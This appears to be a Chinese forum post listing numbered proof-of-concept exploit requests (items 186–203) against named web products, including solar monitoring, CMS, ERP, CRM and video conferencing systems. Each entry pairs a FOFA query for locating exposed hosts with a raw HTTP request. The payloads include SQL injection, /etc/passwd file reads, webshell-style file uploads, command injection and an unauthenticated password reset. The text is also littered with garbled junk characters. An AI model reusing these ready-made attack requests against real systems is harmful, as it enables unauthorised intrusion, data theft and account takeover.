/ b4 b8 K( p) {
- K9 C3 U/ J* X: ?: K186. F-logic DataCube3 SQL注入
, G7 K) G3 T# Q) y4 C3 {CVE-2024-31750- v; J5 w7 L: s) l: k1 e7 q; ~ e7 V, U
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统4 t% \0 S. j4 O5 t9 E3 X
FOFA:title=="DataCube3"' [$ m" q/ d/ g/ D
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1$ Z# w) S1 o; l, E' w# V+ N
Host: your-ip
+ P" Q6 K6 y7 a+ n4 g! F* RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
3 K7 U5 }+ |# j( ?" ?. t# k4 A* E( AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
; |; D2 i" h5 T$ ~0 {" qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# ^5 n$ L; d" RAccept-Encoding: gzip, deflate/ n' W8 z% p6 d* x) y/ F
Connection: close* {8 a @8 U# m O: n
Content-Type: application/x-www-form-urlencoded M4 P& c6 a5 T( z- Y
& K+ R; S4 V9 b$ Q" z& E9 c! Dreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
) ^% u5 b. K- s% j
/ t' R9 x+ W0 T7 ]$ V' |. _1 B7 W
$ A* \6 S: z5 T2 Q7 L187. Mura CMS processAsyncObject SQL注入
8 S) w- @: [5 L% j* }1 s* |6 G5 XCVE-2024-326405 z. Y' P4 L; |7 |/ p- m
FOFA:"Mura CMS"' M9 ~+ y6 J, Q" K
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% ?5 z3 q& f0 R3 _+ N+ VHost: your-ip
( ^5 W* a# L: X1 yContent-Type: application/x-www-form-urlencoded& W o0 j1 P- p; O, w
# f1 ]+ `8 W/ U: p" i
" i9 R$ S6 t9 {+ eobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1& [0 C7 H+ b2 B9 j- U2 O
& d" X" p9 J2 i$ _
! A. l& v3 b7 N# G
188. 叁体-佳会视频会议 attachment 任意文件读取
% n1 Z: Y9 V5 ^- K2 ]' D9 eversion <= 3.9.7
{- i# X8 ? @1 L7 P) B6 p1 ?FOFA:body="/system/get_rtc_user_defined_info?site_id"
! a+ W7 w; T& {% |8 X8 yGET /attachment?file=/etc/passwd HTTP/1.19 i* c! Z' _) R# z
Host: your-ip
0 }# C( N! Q# ^1 s M9 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* j7 ~" T$ D0 `3 s: V+ G3 p; RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; Y! X2 Z% Q' S8 {5 h1 X
Accept-Encoding: gzip, deflate3 T1 X# @+ O1 B' d0 T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% D! a1 O+ d5 ~" C& \Connection: close# N3 t& I3 _; D% R
" m# a+ G) h$ s; I# R6 A ^# Y
1 l) C: a+ r6 D7 S$ y3 M4 R
189. 蓝网科技临床浏览系统 deleteStudy SQL注入' G- _2 v: a0 X, _0 J' b
FOFA:app="LANWON-临床浏览系统"- H( _) s ]7 `' u0 o, I* _) x
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 i! t; R2 q. H; J& t
Host: your-ip$ \' }9 b. D0 @ {
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 X4 a- Z& t+ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( z! l6 Y' b' YAccept-Encoding: gzip, deflate( x8 f1 s: p; z! U7 @8 ^2 h
Accept-Language: zh-CN,zh;q=0.9
2 |& |; ]4 H# s6 f# r( KConnection: close7 D3 U9 e, e! f! w
* f t) [! r- C9 h; [$ I. h/ j) B8 Z$ |' q2 Y( E
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
) D o |2 m- o, a+ s( H' Z' ?FOFA:title=="短视频矩阵营销系统"6 B8 O4 v, }5 D4 }! o3 f, m+ S
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
; R3 P+ ?- U2 S: _) _Host: your-ip. e& ^9 t- f! S5 F: ^* m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
2 f- h. d# K9 z7 d, zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 _1 h& e1 } ^) E2 Y6 l6 {Content-Type: application/x-www-form-urlencoded- H& G* u3 T5 @# a
Accept-Encoding: gzip, deflate x2 e% a5 B; t' r! L/ R; z
Accept-Language: zh-CN,zh;q=0.9( X( ?2 k& v/ b9 r* ~, p: L
^: a% _) @! A l' K- B$ ~poi=file:///etc/passwd
7 n7 i) [0 i) s8 c8 z1 V8 g
+ J8 ]% W7 i3 o9 H! i$ h- R1 N
, h S9 y R; T3 k- F191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" V$ `9 e+ d9 x
FOFA:body="/CDGServer3/index.jsp"3 U$ u! y% s6 B0 k
POST /CDGServer3/js/../NavigationAjax HTTP/1.16 C4 @5 ]8 ^: Z3 \5 o
Host: your-ip- f0 u" q$ T* ?# ^, M2 o4 L5 n- r0 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: u/ w# d. y% r6 h- s; z Z
Content-Type: application/x-www-form-urlencoded
& a! a# w8 Z' L: K0 m
1 h; o. R4 @& Gcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=. {2 M _+ y- ?. {
. ]7 T; g) L+ e) D& ^! Z, o
, K; H/ ]3 @! i. {" q+ `# \$ }192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
, o2 m1 K2 i8 z+ b a2 v% L/ |FOFA:title="用户登录_富通天下外贸ERP"
2 R& q7 ]2 N7 h7 C1 ]POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
8 ^% T6 L+ x# W' I6 w% pHost: your-ip7 v2 [, o n' O, {# O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ R2 r! F* _6 H# U* j% y
Content-Type: application/x-www-form-urlencoded
8 m1 |5 Y3 A `$ G, N. R5 X0 H6 |
& j- I) }% _- e! t% v/ O/ Z% _, g1 b2 D- W
<% @ webhandler language="C#" class="AverageHandler" %>& O4 k" k$ }* {' Z1 I2 ?4 f
using System;
# K P- y9 E6 }0 v7 V- Xusing System.Web;9 ]4 e& I; R- M; F4 D u
public class AverageHandler : IHttpHandler
3 F8 Q3 i, q, W{
0 ?' u9 f* W- w' q$ {' wpublic bool IsReusable
2 \' U# F' Y' q# _* P7 {- j{ get { return true; } }
+ K. a4 W' ?" R( o, Ppublic void ProcessRequest(HttpContext ctx)! {2 B! h7 d1 h5 t. C
{: o# P1 w- H" Q! w! l# p1 W. K+ [) H
ctx.Response.Write("test");
& r$ F- L/ ~( e}
4 V& a: m& B' m4 c8 |# Q}' U" O A$ O; d( Z" ]- R
1 ]2 a) ]) f6 ~) F- j9 H- [7 T- r2 M/ J; e4 F
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
) [) A6 V7 }" R5 GFOFA:body="山石云鉴主机安全管理系统"& ]) _2 \, c! I& o- m b( F
GET /master/ajaxActions/getTokenAction.php HTTP/1.1: m) c, _7 a! J* U
Host:
7 s/ M2 | d9 KCookie: PHPSESSID=2333333333333;
1 q; O1 |. T/ j) x: o. k8 pContent-Type: application/x-www-form-urlencoded
9 ^+ H7 w3 N; }User-Agent: Mozilla/5.0
3 n+ X6 q) g; O( G0 K9 U1 i% k3 t
( t4 R: i7 Y7 g" ]1 Y2 i" v6 a3 ^
* e; q( _0 k+ D) X0 T, aPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
( `, a" ~% H( t. d* |' A3 DHost:
% p" F5 U/ d3 |( n; a; \. PUser-Agent: Mozilla/5.0
! B- f- Y$ j+ \Accept-Encoding: gzip, deflate
# n) c9 k% t- `+ w7 G& E& gAccept: */*3 N; P* p. a6 j) e
Connection: close% h) @; w5 [. ?
Cookie: PHPSESSID=2333333333333;
: z+ S( g1 a, B9 Y D9 GContent-Type: application/x-www-form-urlencoded
: W" i6 X9 T- ^+ z5 T6 JContent-Length: 842 g$ k9 @" ]* u& u& Q
& C+ x0 P: c7 Z; H. b) hparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
3 p. N$ C/ @$ {* }1 n
P# [ o- y& W6 P9 D8 ` l8 u: C* p7 Y: m6 G6 x
GET /master/img/config HTTP/1.11 \6 \- a: @2 I, y
Host:
% ^, X0 i& X3 i4 xUser-Agent: Mozilla/5.0& {- q( z' y0 a* K1 o) _. D
4 W& _8 M3 x: A* q* W3 q3 T' I9 m0 r8 X: c" `7 |
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传7 \( v* r' z3 a8 {! a4 m) I+ `
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在! j& v7 k! ~5 Q) Y. H+ V2 {
( X0 C" @3 h6 X$ A! K. O
POST /servlet/uploadAttachmentServlet HTTP/1.1
$ i1 I4 g- g( [& q9 k$ ?0 g' ZHost: host- t. ]6 M' S: b! Z+ a! o2 ~9 |5 U/ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
) R+ w$ \7 T! R- JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, p4 T2 x! W2 u* P3 S# a! a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 _* ], }- w* E6 S" {Accept-Encoding: gzip, deflate
8 H' }. q3 X( q3 f( v' CConnection: close& X; o# L! l$ b7 ^; E* T3 f: U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ O" ~; g9 h8 ]; P4 B9 w' ^------WebKitFormBoundaryKNt0t4vBe8cX9rZk D/ Z8 q# i# n' z4 t
; `( H6 v$ [) G* e2 l/ T& ^$ dContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"3 a6 m4 R3 n( y5 f1 q( I4 s, ]
Content-Type: text/plain
1 q! e: X" z: |<% out.println("hello");%>8 s/ Q: S. B3 l
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 \( K, Z- @# mContent-Disposition: form-data; name="json"( }- L8 x* j+ c9 l: J- F4 u
{"iq":{"query":{"UpdateType":"mail"}}}
' E' n1 L( p3 ?5 K' _- k, j------WebKitFormBoundaryKNt0t4vBe8cX9rZk--) ~7 k8 Z) F8 c8 R5 ?; D/ _8 E
+ }9 V4 k8 k( x, }0 C
& u5 Z* P$ U! i7 u
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
% H& m9 q; ]. [5 ~3 d1 HFOFA:title=="飞鱼星企业级智能上网行为管理系统
: b+ T3 k( ]! @POST /send_order.cgi?parameter=operation HTTP/1.1
, X5 L# o( [3 A: s, nHost: 127.0.0.1
: H5 K, j7 u8 t8 [) C( T6 |Pragma: no-cache0 Z" K- E! M& T2 x
Cache-Control: no-cache) n6 J, w# u* q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. N8 s( G J: b1 p+ D! O7 i- G
Accept: */*& Y( [7 r c+ j( q% F5 t! b5 c
Accept-Encoding: gzip, deflate
, L- S! h% n R0 b0 S3 s) CAccept-Language: zh-CN,zh;q=0.9
9 a6 o# u- j: E! xConnection: close0 e- P8 {8 q0 H4 p" t5 o0 Z
Content-Type: application/x-www-form-urlencoded# E, }4 h5 B3 u' i+ Z7 B
Content-Length: 68
& ^; |- U# S) O6 g- D) ~
8 @) J9 y7 q4 S) x. W: p{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
& V( v: o9 @4 F, B( _
' F8 A+ C: Z v: n' }0 W0 M( j
: w$ f% F8 M- ]* @9 Q4 w* c196. 河南省风速科技统一认证平台密码重置; r4 i; k1 y `; V
FOFA:body="/cas/themes/zbvc/js/jquery.min.js", I/ f1 D0 G6 Y" H; q
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
/ C, Y! l1 ]( ?: DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 r% [" u# M: F& H2 BContent-Type: application/json;charset=UTF-89 f1 g* I5 N# l! F9 q
X-Requested-With: XMLHttpRequest6 i+ l& p) `1 }8 n' N! S+ K
Host:& Y, s' \1 Q! k" [+ k `0 A/ R! w
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
J3 ]6 j: A% l6 F" G$ dContent-Length: 45
. R7 f8 }: }$ z' e- Q/ k5 qConnection: close
* t: f3 P7 Q) r( g; D4 c1 ]% Z: \ {8 C7 ^* a2 z# e
{"xgh":"test","newPass":"test666","email":""}
8 I- ? x/ q5 k. `: `" R
, ]; Q7 r s6 S, I, A
& X- t; ]/ @3 X) A
4 R" a. ~2 B3 q. y197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" D R4 w" G) S. V6 TFOFA:app="浙大恩特客户资源管理系统"
2 B1 L: x8 H: Y, NGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1 K* e6 [( M; a- S( {" ^
Host:
; C6 ~$ C' f& NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36! R, z4 y+ u; I, D- j7 }
Accept-Encoding: gzip, deflate
h z+ F. x' ]2 q6 D4 N1 j5 cConnection: close
" O; O$ K0 I) r& _' D. @8 \3 a
) D: L% M7 a' c; w. Z
( D' g8 g7 a/ V9 T4 w" I" H
0 }( l: h, X1 n, n! d$ M. ?198. 阿里云盘 WebDAV 命令注入5 }0 S$ W( B7 G9 x7 x7 x
CVE-2024-29640
2 l8 ?0 w. J1 O" Q+ Y( OGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.16 b1 P9 u7 h: t7 Y
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64# j6 V* ]/ |2 m# J9 a7 a6 ?
Accept: */*
! {0 A: v6 h/ Q) h t2 QAccept-Encoding: gzip, deflate9 i' b7 I7 p$ m+ k! |8 x2 n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6/ I0 f) I% | x! g6 K& G
Connection: close$ v0 G% i3 ^3 p, p- p/ Y
6 Q% Z$ U0 k5 O5 B' w
! G5 Y5 p% v1 v- e9 o& x199. cockpit系统assetsmanager_upload接口 文件上传. w w7 D7 o- a
% J/ g0 ~2 f- e- x9 N. G
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:: [! U6 t0 N8 Z7 F; Z% B
GET /auth/login?to=/ HTTP/1.1
( e. l1 ]; d, J! A V2 t# t
& A4 z0 W" [3 W. V! A响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"$ x/ d; M8 M+ g( r; V# u/ A
; ^1 H- @* e d7 O0 S7 Y2.使用刚才上一步获取到的jwt获取cookie:
& j# P. F* ^. i. `1 L% W5 [7 Q/ S ?/ T: ?- d
POST /auth/check HTTP/1.1- m. G \3 ]- m# g
Content-Type: application/json
, g( A, G- y5 e& |; J4 {
* e6 A, l G$ f$ ~: |* y' x{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
4 D0 Q/ g, J5 N1 p% E/ R3 l6 d: I% r: ]
响应:200,返回值:* H) l2 ~6 [% _! g5 `/ \4 A
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/: \5 }* W3 Y: e8 i* L
Fofa:title="Authenticate Please!"
& u0 S+ {; P& i' D3 f" |POST /assetsmanager/upload HTTP/1.1; {2 n% ]2 f; {1 K7 g9 \
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb39 L" j z/ A$ a
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92% K$ V) s) E, ?% ^
; r8 ?& m" X% p& N* j* f-----------------------------36D28FBc36bd6feE7Fb3
- c: W* v5 x9 ^$ bContent-Disposition: form-data; name="files[]"; filename="tttt.php"/ r; S9 Z3 e5 S
Content-Type: text/php
2 ~" b( E0 c6 f) V; T
1 n; j0 g1 u+ } z3 }<?php echo "tttt";unlink(__FILE__);?>
4 n0 z) T! B/ F" k* k! Q-----------------------------36D28FBc36bd6feE7Fb3
) M8 ` f6 f) }" n' z) D2 oContent-Disposition: form-data; name="folder". @* p9 ` T( Q2 P% p
4 Q7 l2 L8 _1 @1 K: V2 S-----------------------------36D28FBc36bd6feE7Fb3--, b4 I3 g, R8 V. F
8 s8 q9 N) k; t6 ?1 W
4 H& B' D/ w6 q; m% \0 p4 z
/storage/uploads/tttt.php
* l# j4 Y0 C/ H- y5 f5 `' O m |; `4 w* N
200. SeaCMS海洋影视管理系统dmku SQL注入* O1 ?9 B0 T- C9 K0 u% V; Y
FOFA:app="海洋CMS"
5 A+ { ]! S$ G) \. qGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1. M4 x% P/ n* L/ }8 E
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' p# [. o; {; ^8 A: FUpgrade-Insecure-Requests: 1. C: N' d, x8 @3 \8 s8 {
Cache-Control: max-age=0
" J0 m5 p+ r5 ~ ~. Q3 f* F/ D( @( W5 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 s8 O1 |6 a+ _! p
Accept-Encoding: gzip, deflate& a. z' T; \( j) a/ ]
Accept-Language: zh-CN,zh;q=0.9' [/ O* T# [5 I2 V
9 N' i5 d2 |. N9 I4 ^+ E
+ z0 o& |' N+ G# I8 S7 C& _201. 方正全媒体新闻采编系统 binary SQL注入" D. n( ?4 G; U, U3 c8 K3 ^+ L# N
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"* [$ J% W0 }5 ^0 Q* F, w
POST /newsedit/newsplan/task/binary.do HTTP/1.1" J- r) d# @2 j, d- ]
Content-Type: application/x-www-form-urlencoded
) ^. B+ U: ?; M0 }, n A& ?% ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# k/ V0 Z$ I9 l$ j8 o, YAccept-Encoding: gzip, deflate# F% G; }( b. q
Accept-Language: zh-CN,zh;q=0.9
6 j( I; S( ^2 U& D) OConnection: close
3 S1 p5 f8 _/ |9 M, Y7 k
( g& T; i. y$ Q2 t. w9 XTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
3 i1 |* t5 i& O% C: {& X
# {0 q4 D) v: G5 L" ^; g" |* A
! {7 j8 ^' @* z0 g5 |/ p! [202. 微擎系统 AccountEdit任意文件上传7 `$ i, x2 I; j: r* _6 @; f
FOFA:body="/Widgets/WidgetCollection/"7 w) _8 O: I9 Q7 ?+ v, [
获取__VIEWSTATE和__EVENTVALIDATION值# w' K9 b. C/ ]$ k; p+ `2 [. A
GET /User/AccountEdit.aspx HTTP/1.1
5 i# d* [! p! T4 k T" {; IHost: 滑板人之家9 T* \- y4 p/ y5 N' O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
7 G9 E: d2 G7 d* FContent-Length: 0' ~4 z0 O( m& j3 X: W, a% s
8 A3 ?; E7 ~, q2 h. k9 v' J1 T7 I
3 F( z* H$ Y; n; _; W
替换__VIEWSTATE和__EVENTVALIDATION值
* R r1 h, L" T' UPOST /User/AccountEdit.aspx HTTP/1.12 }7 M% ?' m+ s
Accept-Encoding: gzip, deflate, br
; P: p7 R/ T {8 @# M' ]Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356879 n5 y$ L* a( m
6 x, r9 l+ o7 _' y' I/ b# C+ @
-----------------------------786435874t38587593865736587346567358735687
! P/ T' G/ w0 L! z0 h+ bContent-Disposition: form-data; name="__VIEWSTATE"0 T( U% W0 p ^7 T/ R
/ a3 B0 y: I R" Q! G0 F
__VIEWSTATE
) e# {) ]; u w$ I/ M7 E-----------------------------786435874t385875938657365873465673587356878 G3 C, @1 k& J5 P
Content-Disposition: form-data; name="__EVENTVALIDATION"3 i3 q# C: k$ ]- k6 E
; E6 H f, a/ z( W
__EVENTVALIDATION7 u6 h! m' P& H
-----------------------------786435874t38587593865736587346567358735687. \1 R6 V9 o b4 e; f2 Z9 z3 a" z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
& ~, O" W8 m4 I% OContent-Type: text/plain, x! e* _9 t) s/ q9 D% E B4 P
# J6 ?/ J6 c- T1 ?, J
Hello World!) f% n E+ c4 L% ?- v# A
-----------------------------786435874t38587593865736587346567358735687; a; r/ k4 o( R6 r+ \
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"9 F4 K' X+ Y1 h! ~- c. ^& Z/ T
3 R2 b! L J1 j% n( X% @( }上传图片
2 L& S3 P4 U! o9 H4 O# \+ S) x1 u/ Z-----------------------------786435874t38587593865736587346567358735687
6 ^1 \2 {- y3 W" l' ]+ e) aContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"; q9 S; m9 C# g" G: S: d
+ ?: u" Q/ a8 s8 F
6 @# s/ O, k8 s7 E-----------------------------786435874t38587593865736587346567358735687! a1 s& F1 _ W
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"* D z, y+ j' M, }, M
# ?& m% F2 n$ Q) v) _. j1 }* ?; x
5 w6 L7 s: K4 k) k( v/ ?- l" H* U
-----------------------------786435874t38587593865736587346567358735687--
% |7 G/ \; k1 y8 q) L* ^
+ c( ^* B/ z( \0 i S% [* R% Y' r: W
2 @2 ?+ A. e& B) \+ O! m m/_data/Uploads/1123.txt
" v# f8 }% S0 n( I0 A% @
& Z, F* [: W, ^0 m203. 红海云EHR PtFjk 文件上传( B) O- X g9 k% W
FOFA:body="RedseaPlatform"+ ~/ ?: I6 R `# S# P% |
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
% p8 H, x( B7 G' {! C/ V/ nHost: x.x.x.x
& O, @0 |4 Q6 u- J6 K( R3 ]6 RAccept-Encoding: gzip: H9 \6 ]4 q8 O4 r: V3 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 e& i9 r; |. ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
% |) c- d& {' m: vContent-Length: 210; |7 n0 y0 Q+ n, K. b7 J
& B9 `! s ?+ p1 m" _------WebKitFormBoundaryt7WbDl1tXogoZys4' d5 ~: h J: v6 I R b$ C: A
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"/ L# o( z: N* m9 [0 K$ I# Z" u
Content-Type:image/jpeg! D+ a( X2 }" f z
5 ]/ I3 b" x/ l) b
<% out.print("hello,eHR");%>
2 P0 [7 f, s }* ^------WebKitFormBoundaryt7WbDl1tXogoZys4--
9 z( y9 H9 E; L6 i5 M% r8 [% l# B' d1 {* m3 L- {. V8 z$ ^
$ @' K y6 V f0 q
+ ~1 H1 ?& L" P7 O
3 D. Q9 c: @2 G4 S
9 w9 P0 K( Z4 E8 _
( s2 k8 F! s- s1 n9 d T: S |
发表于 2024-6-5 14:31:29
收藏
支持
反对